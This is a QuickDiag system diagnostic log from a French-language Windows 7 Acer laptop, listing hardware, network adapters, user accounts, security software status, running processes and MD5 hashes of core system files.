--------------- QuickDiag | g3n-h@ckm@n | 2_17.07.2016.1 ---------------

----- XP | Vista | 7 | 8 | 8.1 | 10 - 32/64 bits ----- - Start 23/07/2016 18:25:15

Updated 17/07/2016 | 08.15 by g3n-h@ckm@n
Contact : http://www.sosvirus.net/

Time Zone : (UTC+01:00) Bruxelles, Copenhague, Madrid, Paris
[Utilisateur (Administrator)] - [ORDINATEUR] (S-1-5-21-3594765525-3045979897-1626392610-1000)

System: Microsoft Windows 7 Édition Familiale Premium  - Service Pack 1 - (6.1.7601) -  BuildType: Multiprocessor Free - OSLanguage: 1036 (040c)
System: AutoReboot: True - DebugFilePath: %SystemRoot%\MEMORY.DMP - KernelDumpOnly: False - OverwriteExistingDebugFile: True - WriteDebugInfo: True - WriteToSystemLog: True
Boot : Microsoft Windows 7 Édition Familiale Premium |C:\Windows|\Device\Harddisk0\Partition2
Boot : Normal boot
PC: Aspire 5742G - Acer - IdNumber: LXR92020341102CBFF1601 - UUID: 6129E337-B434-6E18-6B71-1C7508DFA56F
Processor : X64 - 2128 Mhz - Intel(R) Pentium(R) CPU        P6200  @ 2.13GHz
InsydeH2O Version V1.30 -  - Acer - S/N: LXR92020341102CBFF1601 - V1.30 - ACRSYS - 1
CoreTemp : ? Celsius

----------| Quick


---------- | SoundDevice

ManyCam Virtual Microphone - Status: Error - Manufacturer: Visicom Media Inc. - PNPDeviceID: ROOT\MEDIA\0001
Périphérique audio haute définition - Status: OK - Manufacturer: Microsoft - PNPDeviceID: HDAUDIO\FUNC_01&VEN_1002&DEV_AA01&SUBSYS_00AA0100&REV_1002\5&2C62A6F9&0&0001
Realtek High Definition Audio - Status: OK - Manufacturer: Realtek - PNPDeviceID: HDAUDIO\FUNC_01&VEN_10EC&DEV_0272&SUBSYS_10250487&REV_1000\4&2E3491B0&0&0001

---------- | Video

ATI Mobility Radeon Graphics        - Resolution: 1366x768 - Colors: 4294967296 - RefreshRate: 60 - 32 Bits Per Pixel - DeviceID: VideoController1 - Drivers: aticfx64.dll,aticfx64.dll,aticfx64.dll,aticfx32,aticfx32,aticfx32,atiumd64.dll,atidxx64.dll,atidxx64.dll,atiumdag,atidxx32,atidxx32,atiumdva,atiumd6a.cap,atitmm64.dll - PNPDeviceID: PCI\VEN_1002&DEV_68E4&SUBSYS_04871025&REV_00\4&6FAB1F9&0&0008 - AdapterCompatibility: ATI Technologies Inc. - RAM: 536870912
Inegrated Video Chipset DeviceName: ATI Mobility Radeon Graphics        - DriverVersion: 8.14.01.6117 - SpecificationVersion: 1025

---------- | Codecs

c:\windows\system32\msrle32.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 16384 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msvidc32.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 38912 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\imaadp32.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 22016 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msg711.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 14848 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msgsm32.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 29184 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msadp32.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 24064 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msyuv.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 25600 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\iyuv_32.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 54272 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\tsbyuv.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 14848 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\l3codeca.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 81408 -  Manufacturer: Fraunhofer Institut Integrierte Schaltungen IIS - Status: OK

---------- | CPU

CPU #1 value:5 %
CPU #2 value:5 %
Total Overall CPU Usage value:5 %

---------- | Network

Broadcom NetLink [TM] Gigabit Ethernet _2 : SENT:0 bytes/sec / RECVD:0 bytes/sec
Carte réseau Broadcom 802.11n : SENT:0 bytes/sec / RECVD:0 bytes/sec
Microsoft Virtual WiFi Miniport Adapter : SENT:0 bytes/sec / RECVD:0 bytes/sec
Teredo Tunneling Pseudo-Interface : SENT:0 bytes/sec / RECVD:0 bytes/sec
isatap.SSI : SENT:0 bytes/sec / RECVD:0 bytes/sec
isatap.lan : SENT:0 bytes/sec / RECVD:0 bytes/sec
isatap.{EDE2CCC7-7C7D-4926-9F38-FC3F3D6B85AB} : SENT:0 bytes/sec / RECVD:0 bytes/sec

Overall -> SEND Maxium:5 bytes/sec,  /  RECEIVE Maximum:0 bytes/sec

WAN Miniport (SSTP) -  - Microsoft - Status:  - PnPID : ROOT\MS_SSTPMINIPORT\0000
WAN Miniport (IKEv2) -  - Microsoft - Status:  - PnPID : ROOT\MS_AGILEVPNMINIPORT\0000
WAN Miniport (L2TP) -  - Microsoft - Status:  - PnPID : ROOT\MS_L2TPMINIPORT\0000
WAN Miniport (PPTP) -  - Microsoft - Status:  - PnPID : ROOT\MS_PPTPMINIPORT\0000
WAN Miniport (PPPOE) -  - Microsoft - Status:  - PnPID : ROOT\MS_PPPOEMINIPORT\0000
WAN Miniport (IPv6) -  - Microsoft - Status:  - PnPID : ROOT\MS_NDISWANIPV6\0000
WAN Miniport (Network Monitor) -  - Microsoft - Status:  - PnPID : ROOT\MS_NDISWANBH\0000
Broadcom NetLink (TM) Ethernet -  -  - Status:  - PnPID : 
WAN Miniport (IP) -  - Microsoft - Status:  - PnPID : ROOT\MS_NDISWANIP\0000
Carte Microsoft ISATAP #2 - Tunnel - Microsoft - Status:  - PnPID : ROOT\*ISATAP\0000
RAS Async Adapter - Réseau étendu (WAN) - Microsoft - Status:  - PnPID : SW\{EEAB7790-C514-11D1-B42B-00805FC1270E}\ASYNCMAC
Teredo Tunneling Pseudo-Interface - Tunnel - Microsoft - Status:  - PnPID : ROOT\*TEREDO\0000
Broadcom NetLink (TM) Gigabit Ethernet -  -  - Status:  - PnPID : 
Broadcom NetLink (TM) Gigabit Ethernet #2 - Ethernet 802.3 - Broadcom - Status:  - PnPID : PCI\VEN_14E4&DEV_1692&SUBSYS_04871025&REV_01\4&14D14F08&0&00E0
Carte réseau Broadcom 802.11n - Ethernet 802.3 - Broadcom - Status:  - PnPID : PCI\VEN_14E4&DEV_4357&SUBSYS_E021105B&REV_01\4&539EEA8&0&00E1
Microsoft Virtual WiFi Miniport Adapter - Ethernet 802.3 - Microsoft - Status:  - PnPID : {5D624F94-8850-40C3-A3FA-A4FD2080BAF3}\VWIFIMP\5&33E32EAA&0&01
Carte Microsoft ISATAP #3 - Tunnel - Microsoft - Status:  - PnPID : ROOT\*ISATAP\0001
Carte Microsoft ISATAP #4 - Tunnel - Microsoft - Status:  - PnPID : ROOT\*ISATAP\0002
Carte Microsoft 6to4 - Tunnel - Microsoft - Status:  - PnPID : ROOT\*6TO4MP\0000

---------- | Memory

RAM = Total (MB) : 6151 | Free (MB) : 4378
Pagefile = Total (MB) : 10343 | Free (MB) : 8452
Virtual = Total (MB) : 4194 | Free (MB) : 4033

Physical Memory 0 : Capacity: 2147483648 - DIMM0 - Posit.: 1 - Manufacturer:  - PartNumber: ACR256X64D3S1333C9 - S/N: 661DCB0E
Physical Memory 1 : Capacity: 4294967296 - DIMM1 - Posit.: 2 - Manufacturer:  - PartNumber: NT4GC64B8HB0NS-CG  - S/N: 96C030E9

---------- | SID Users

Administrateur : [S-1-5-21-3594765525-3045979897-1626392610-500]
ASPNET : [S-1-5-21-3594765525-3045979897-1626392610-1006]
HomeGroupUser$ : [S-1-5-21-3594765525-3045979897-1626392610-1004]
Invité : [S-1-5-21-3594765525-3045979897-1626392610-501]
Utilisateur : [S-1-5-21-3594765525-3045979897-1626392610-1000]
Administrateurs : [S-1-5-32-544]
IIS_IUSRS : [S-1-5-32-568]
Invités : [S-1-5-32-546]
Lecteurs des journaux d’événements : [S-1-5-32-573]
Utilisateurs : [S-1-5-32-545]
Utilisateurs de l’Analyseur de performances : [S-1-5-32-558]
Utilisateurs du journal de performances : [S-1-5-32-559]
Utilisateurs du modèle COM distribué : [S-1-5-32-562]
HomeUsers : [S-1-5-21-3594765525-3045979897-1626392610-1003]
IIS_WPG : [S-1-5-21-3594765525-3045979897-1626392610-1005]

---------- | Drives

C:\ -> [Fixed] | [Disque dur] | Total : 696.79 Go | Free : 337.59 Go -> NTFS [SATA]

Disk Usage Information [1 total Physical Disks]

Physical Drive #0 [C:] : Read:7,916,434 bytes/sec, Written:1,090,186 bytes/sec Max Read:7,916,434 bytes/sec, Max Write:1,090,186 bytes/sec 

Overall - Read Maximum:7,916,434 bytes/sec, Write Maximum:1,090,186 bytes/sec

DeviceID: \\.\PHYSICALDRIVE0 - Status: OK - IDE - Fixed hard disk media - 2 Part. - PnPID : SCSI\DISK&VEN_ATA&PROD_WDC_WD7500BPVT-2\4&569FB1D&0&000000

---------- | Windows updates

Last detection : 2016-07-23 11:59:16
Downloaded last ones : 2016-07-23 12:06:46
Installed last ones : 2016-07-23 11:57:19
Next search : 2016-07-24 07:55:41

Windows Is Activated

---------- | Browsers

IE : 11.0.9600.18377     (© Microsoft Corporation. Tous droits réservés.)
FF : 47.0.0.5999     (©Firefox and Mozilla Developers; available under the MPL 2 license.)
GC : 51.0.2704.103     (Copyright 2015 Google Inc.)

Default : "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1"

---------- | FlashPlayer

FlashPlayer ActiveX : 22.0.0.210
FlashPlayer Plugin : 22.0.0.209

---------- | Security

AV : Microsoft Security Essentials Disabled
AS : Windows Defender Disabled
AM : Malwarebytes' Anti-Malware   ( 2.3.173.0)     [Update : 25/06/2016 20:30:31]
FW : WINDOWS Firewall
WMI : OK
WU: Windows Update Service [Auto(2)] = Running
AS: Windows Defender [Manual(3)] = stopped
WMI: Windows Management Instrumentation [Auto(2)] = Running

---------- | Running processes

292 | [Owner : Système | Parent : 4(System) | ?????] - (.Microsoft Corporation - Gestionnaire de sessions Windows.) - (6.1.7601.23418) = C:\Windows\System32\smss.exe     [10/05/2016 23:37:23]    CPU Usage:0 %
480 | [Owner :  | Parent : 400() | ?????] - (.Microsoft Corporation - Application de démarrage de Windows.) - (6.1.7600.16385) = C:\Windows\System32\wininit.exe     [14/07/2009 01:52:37]    CPU Usage:0 %
540 | [Owner :  | Parent : 480(wininit.exe) | ?????] - (.Microsoft Corporation - Applications Services et Contrôleur.) - (6.1.7601.18829) = C:\Windows\System32\services.exe     [12/05/2015 21:15:36]    CPU Usage:0 %
564 | [Owner :  | Parent : 480(wininit.exe) | ?????] - (.Microsoft Corporation - Local Security Authority Process.) - (6.1.7601.23452) = C:\Windows\System32\lsass.exe     [15/06/2016 01:53:33]    CPU Usage:0 %
572 | [Owner :  | Parent : 480(wininit.exe) | ?????] - (.Microsoft Corporation - Service du gestionnaire de session locale.) - (6.1.7601.17514) = C:\Windows\System32\lsm.exe     [21/11/2010 05:23:53]    CPU Usage:0 %
668 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:4 %
752 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
804 | [Owner :  | Parent : 472(audiodg.exe) | ?????] - (.Microsoft Corporation - Application d’ouverture de session Windows.) - (6.1.7601.18540) = C:\Windows\System32\winlogon.exe     [16/10/2014 06:01:34]    CPU Usage:0 %
852 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Antimalware Service Executable.) - (4.9.218.0) = C:\Program Files\Microsoft Security Client\MsMpEng.exe     [29/01/2016 20:34:20]    CPU Usage:0 %
968 | [Owner :  | Parent : 540(services.exe) | ?????] - (.AMD - AMD External Events Service Module.) - (6.14.11.1059) = C:\Windows\System32\atiesrxx.exe     [30/03/2014 20:45:44]    CPU Usage:0 %
1008 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
364 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
392 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
424 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
472 | [Owner :  | Parent : 1008(svchost.exe) | ?????] - (.Microsoft Corporation - Isolation graphique de périphérique audio Windows.) - (6.1.7601.18741) = C:\Windows\System32\audiodg.exe     [11/03/2015 01:34:58]    CPU Usage:0 %
504 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
1128 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
1176 | [Owner :  | Parent : 968(atiesrxx.exe) | ?????] - (.AMD - AMD External Events Client Module.) - (6.14.11.1059) = C:\Windows\System32\atieclxx.exe     [30/03/2014 20:45:44]    CPU Usage:0 %
1400 | [Owner : Utilisateur | Parent : 364(svchost.exe) | 5.76 Mo] - (.Microsoft Corporation - Gestionnaire de fenêtres du Bureau.) - (6.1.7600.16385) = C:\Windows\System32\dwm.exe     [14/07/2009 01:37:38]    CPU Usage:0 %
1440 | [Owner :  | Parent : 364(svchost.exe) | ?????] - (.Microsoft Corporation - Infrastructure d’extensibilité pour les services réseau Windows sans fil 802.11.) - (6.1.7600.16385) = C:\Windows\System32\wlanext.exe     [14/07/2009 02:07:15]    CPU Usage:0 %
1448 | [Owner : Utilisateur | Parent : 1392() | 53.6 Mo] - (.Microsoft Corporation - Explorateur Windows.) - (6.1.7601.23418) = C:\Windows\explorer.exe     [15/06/2016 01:52:14]    CPU Usage:0 %
1472 | [Owner :  | Parent : 408(csrss.exe) | ?????] - (.Microsoft Corporation - Hôte de la fenêtre de la console.) - (6.1.7601.23418) = C:\Windows\System32\conhost.exe     [10/05/2016 23:37:22]    CPU Usage:0 %
1536 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Application sous-système spouleur.) - (6.1.7601.17777) = C:\Windows\System32\spoolsv.exe     [17/08/2012 10:14:23]    CPU Usage:0 %
1564 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
1648 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Adobe Systems Incorporated - Adobe Acrobat Update Service.) - (1.824.19.1728) = C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe     [25/06/2016 01:45:12]    CPU Usage:0 %
1700 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Camshare Inc. - Camfrog Video Chat update service.) - (1.2.0.5) = C:\Program Files (x86)\Camfrog\Camfrog Video Chat\update\cf_update_service.exe     [15/03/2016 06:40:22]    CPU Usage:0 %
1728 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
1772 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Digital Wave Ltd. - Digital Wave Update Service.) - (1.0.4.1029) = C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe     [31/10/2015 19:15:06]    CPU Usage:0 %
1924 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Dritek System Inc. - Dritek WMI Service.) - (2.8.0.708) = C:\Program Files (x86)\Launch Manager\dsiwmis.exe     [07/02/2013 12:20:29]    CPU Usage:0 %
2212 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Microsoft Application Virtualization Virtual Service Agent.) - (4.6.3.25281) = C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe     [08/10/2014 18:18:56]    CPU Usage:0 %
2264 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
2320 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corp. - Microsoft® Windows Live ID Service.) - (7.250.4311.0) = C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE     [17/07/2012 16:14:44]    CPU Usage:0 %
2396 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Microsoft Application Virtualization Client Service.) - (4.6.3.25281) = C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe     [08/10/2014 18:18:50]    CPU Usage:0 %
2448 | [Owner :  | Parent : 2320(WLIDSVC.EXE) | ?????] - (.Microsoft Corp. - Microsoft® Windows Live ID Service Monitor.) - (7.250.4311.0) = C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE     [17/07/2012 16:14:44]    CPU Usage:0 %
2708 | [Owner :  | Parent : 424(svchost.exe) | ?????] - (.Microsoft Corporation - Moteur du Planificateur de tâches.) - (6.1.7601.17514) = C:\Windows\System32\taskeng.exe     [21/11/2010 05:24:27]    CPU Usage:0 %
2716 | [Owner : Utilisateur | Parent : 540(services.exe) | 11.83 Mo] - (.Microsoft Corporation - Processus hôte pour Tâches Windows.) - (6.1.7601.18010) = C:\Windows\System32\taskhost.exe     [27/01/2013 19:34:44]    CPU Usage:0 %
2924 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Microsoft Office Client Virtualization Service.) - (14.0.7147.5000) = C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE     [18/03/2015 19:51:28]    CPU Usage:0 %
2988 | [Owner :  | Parent : 2708(taskeng.exe) | ?????] - (.Google Inc. - Programme d'installation de Google.) - (1.3.27.5) = C:\Program Files (x86)\Google\Update\GoogleUpdate.exe     [13/06/2015 10:29:55]    CPU Usage:0 %
876 | [Owner : Utilisateur | Parent : 2980() | 2.21 Mo] - (.Microsoft Corporation - GWX.) - (6.3.9600.18345) = C:\Windows\System32\GWX\GWX.exe     [26/05/2016 07:51:02]    CPU Usage:0 %
948 | [Owner :  | Parent : 2988(GoogleUpdate.exe) | ?????] - (.Google Inc. - Google Crash Handler.) - (1.3.30.3) = C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler.exe     [11/05/2016 00:08:30]    CPU Usage:0 %
1724 | [Owner :  | Parent : 2988(GoogleUpdate.exe) | ?????] - (.Google Inc. - Google Crash Handler.) - (1.3.30.3) = C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler64.exe     [11/05/2016 00:08:30]    CPU Usage:0 %
3220 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Service de la passerelle de la couche Application.) - (6.1.7600.16385) = C:\Windows\System32\alg.exe     [14/07/2009 02:08:47]    CPU Usage:0 %
3244 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Service de la plateforme de protection logicielle Microsoft.) - (6.1.7601.17514) = C:\Windows\System32\sppsvc.exe     [21/11/2010 05:23:56]    CPU Usage:0 %
3332 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
3628 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
3748 | [Owner : Utilisateur | Parent : 1448(explorer.exe) | 18.2 Mo] - (.Microsoft Corporation - Microsoft Security Client User Interface.) - (4.9.218.0) = C:\Program Files\Microsoft Security Client\msseces.exe     [29/01/2016 20:27:36]    CPU Usage:0 %
3944 | [Owner : Utilisateur | Parent : 1448(explorer.exe) | 3.83 Mo] - (.McAfee, Inc. - McAfee Security Scanner Scheduler.) - (3.11.334.0) = C:\AdsFix\Quarantine\C\Program Files\McAfee Security Scan.AdsFix\3.11.334\SSScheduler.exe     [31/05/2016 14:46:18]    CPU Usage:0 %
4076 | [Owner : Utilisateur | Parent : 3880() | 8.45 Mo] - (.Oracle Corporation - Java Update Scheduler.) - (2.8.91.14) = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe     [01/04/2016 02:16:28]    CPU Usage:0 %
1480 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Indexeur Microsoft Windows Search.) - (7.0.7601.17610) = C:\Windows\System32\SearchIndexer.exe     [17/08/2012 10:13:06]    CPU Usage:4 %
216 | [Owner :  | Parent : 1480(SearchIndexer.exe) | ?????] - (.Microsoft Corporation - Microsoft Windows Search Protocol Host.) - (7.0.7601.17610) = C:\Windows\System32\SearchProtocolHost.exe     [17/08/2012 10:13:06]    CPU Usage:0 %
4164 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [14/07/2009 01:31:13]    CPU Usage:0 %
4400 | [Owner : Utilisateur | Parent : 1448(explorer.exe) | 98.95 Mo] - (.Google Inc. - Google Chrome.) - (51.0.2704.103) = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe     [13/06/2015 10:44:27]    CPU Usage:0 %
4416 | [Owner : Utilisateur | Parent : 4400(chrome.exe) | 4.31 Mo] - (.Google Inc. - Google Chrome.) - (51.0.2704.103) = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe     [13/06/2015 10:44:27]    CPU Usage:0 %
4448 | [Owner : Utilisateur | Parent : 4400(chrome.exe) | 5.46 Mo] - (.Google Inc. - Google Chrome.) - (51.0.2704.103) = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe     [13/06/2015 10:44:27]    CPU Usage:0 %
4588 | [Owner : Utilisateur | Parent : 4400(chrome.exe) | 104.69 Mo] - (.Google Inc. - Google Chrome.) - (51.0.2704.103) = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe     [13/06/2015 10:44:27]    CPU Usage:0 %
3676 | [Owner : Utilisateur | Parent : 1284() | 7.14 Mo] - (.Piriform Ltd - CCleaner.) - (5.6.0.5219) = C:\Program Files\CCleaner\CCleaner64.exe     [08/05/2015 21:49:04]    CPU Usage:0 %
2180 | [Owner : Utilisateur | Parent : 4400(chrome.exe) | 144.82 Mo] - (.Google Inc. - Google Chrome.) - (51.0.2704.103) = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe     [13/06/2015 10:44:27]    CPU Usage:8 %
356 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Intel Corporation - IAStorDataSvc.) - (11.7.0.1013) = C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe     [07/02/2013 12:23:46]    CPU Usage:0 %
3856 | [Owner : Utilisateur | Parent : 4400(chrome.exe) | 89.86 Mo] - (.Google Inc. - Google Chrome.) - (51.0.2704.103) = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe     [13/06/2015 10:44:27]    CPU Usage:0 %
4908 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Intel Corporation - Local Manageability Service.) - (6.1.0.1044) = C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe     [07/02/2013 12:25:25]    CPU Usage:0 %
3588 | [Owner :  | Parent : 540(services.exe) | ?????] - (.Intel Corporation - User Notification Service.) - (6.1.0.1044) = C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe     [07/02/2013 12:25:26]    CPU Usage:0 %
3916 | [Owner : Utilisateur | Parent : 4400(chrome.exe) | 54.89 Mo] - (.Google Inc. - Google Chrome.) - (51.0.2704.103) = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe     [13/06/2015 10:44:27]    CPU Usage:0 %
4664 | [Owner : Utilisateur | Parent : 4076(jusched.exe) | 30.17 Mo] - (.Oracle Corporation - Java Update Checker.) - (2.8.91.14) = C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe     [01/04/2016 02:16:12]    CPU Usage:0 %
300 | [Owner : Système | Parent : 1480(SearchIndexer.exe) | 9.17 Mo] - (.Microsoft Corporation - Microsoft Windows Search Filter Host.) - (7.0.7601.17610) = C:\Windows\System32\SearchFilterHost.exe     [17/08/2012 10:13:05]    CPU Usage:0 %
3344 | [Owner : Utilisateur | Parent : 1448(explorer.exe) | 22.73 Mo] - (.SosVirus - QuickDiag.) - (17.7.2016.1) = C:\Users\Utilisateur\Downloads\QuickDiag.exe     [19/07/2016 22:55:28]    CPU Usage:4 %

---------- | MD5

[MD5.9DA3B83F80E205B6C601EEE1312FD0A0] - [15/06/2016 01:52:14] - (.© Microsoft Corporation. Tous droits réservés. - Explorateur Windows.) - [3155.5 Ko] - (6.1.7601.23418) : C:\Windows\Explorer.exe
[MD5.5746BD7E255DD6A8AFA06F7C42C1BA41] - [21/11/2010 05:23:55] - (.© Microsoft Corporation. Tous droits réservés. - Interpréteur de commandes Windows.) - [337 Ko] - (6.1.7601.17514) : C:\Windows\System32\cmd.exe
[MD5.60C2862B4BF0FD9F582EF344C2B1EC72] - [14/07/2009 01:19:49] - (.© Microsoft Corporation. Tous droits réservés. - Processus d’exécution client-serveur.) - [7.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\csrss.exe
[MD5.A8EDB86FC2A4D6D1285E4C70384AC35A] - [14/07/2009 01:59:17] - (.© Microsoft Corporation. - COM Surrogate.) - [9.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\dllhost.exe
[MD5.ACEDF96749861DB3DA92AE9B9D94FE72] - [10/05/2016 23:37:23] - (.© Microsoft Corporation. Tous droits réservés. - DLL du client API BASE Windows NT.) - [1136 Ko] - (6.1.7601.23418) : C:\Windows\System32\Kernel32.dll
[MD5.C8A7F80DB5C193DD67747A1BA4B1782E] - [15/06/2016 01:53:33] - (.© Microsoft Corporation. - Local Security Authority Process.) - [30 Ko] - (6.1.7601.23452) : C:\Windows\System32\lsass.exe
[MD5.622C96AFB07BB82C8650B47172137AC4] - [13/04/2016 04:00:03] - (.© Microsoft Corporation. - Distributed COM Services.) - [499.5 Ko] - (6.1.7601.19143) : C:\Windows\System32\rpcss.dll
[MD5.DD81D91FF3B0763C392422865C9AC12E] - [14/07/2009 01:57:20] - (.© Microsoft Corporation. Tous droits réservés. - Processus hôte Windows (Rundll32).) - [44.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\rundll32.exe
[MD5.71C85477DF9347FE8E7BC55768473FCA] - [12/05/2015 21:15:36] - (.© Microsoft Corporation. Tous droits réservés. - Applications Services et Contrôleur.) - [321 Ko] - (6.1.7601.18829) : C:\Windows\System32\services.exe
[MD5.C78655BC80301D76ED4FEF1C1EA40A7D] - [14/07/2009 01:31:13] - (.© Microsoft Corporation. Tous droits réservés. - Processus hôte pour les services Windows.) - [26.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\svchost.exe
[MD5.06BF84D26A05D400F6B3FB3D3DE0B03A] - [09/12/2015 11:49:37] - (.© Microsoft Corporation. Tous droits réservés. - DLL client de l’API uilisateur de Windows multi-utilisateurs.) - [985 Ko] - (6.1.7601.19061) : C:\Windows\System32\user32.dll
[MD5.BAFE84E637BF7388C96EF48D4D3FDD53] - [21/11/2010 05:24:28] - (.© Microsoft Corporation. Tous droits réservés. - Application d’ouverture de session Userinit.) - [30 Ko] - (6.1.7601.17514) : C:\Windows\System32\userinit.exe
[MD5.94355C28C1970635A31B3FE52EB7CEBA] - [14/07/2009 01:52:37] - (.© Microsoft Corporation. Tous droits réservés. - Application de démarrage de Windows.) - [126 Ko] - (6.1.7600.16385) : C:\Windows\System32\Wininit.exe
[MD5.8CEBD9D0A0A879CDE9F36F4383B7CAEA] - [16/10/2014 06:01:34] - (.© Microsoft Corporation. Tous droits réservés. - Application d’ouverture de session Windows.) - [444.5 Ko] - (6.1.7601.18540) : C:\Windows\System32\Winlogon.exe
[MD5.9A4A1EEE802BF2F878EE8EAB407B21B7] - [11/11/2015 11:35:25] - (.© Microsoft Corporation. Tous droits réservés. - Ancillary Function Driver for WinSock.) - [486 Ko] - (6.1.7601.19031) : C:\Windows\System32\Drivers\afd.sys
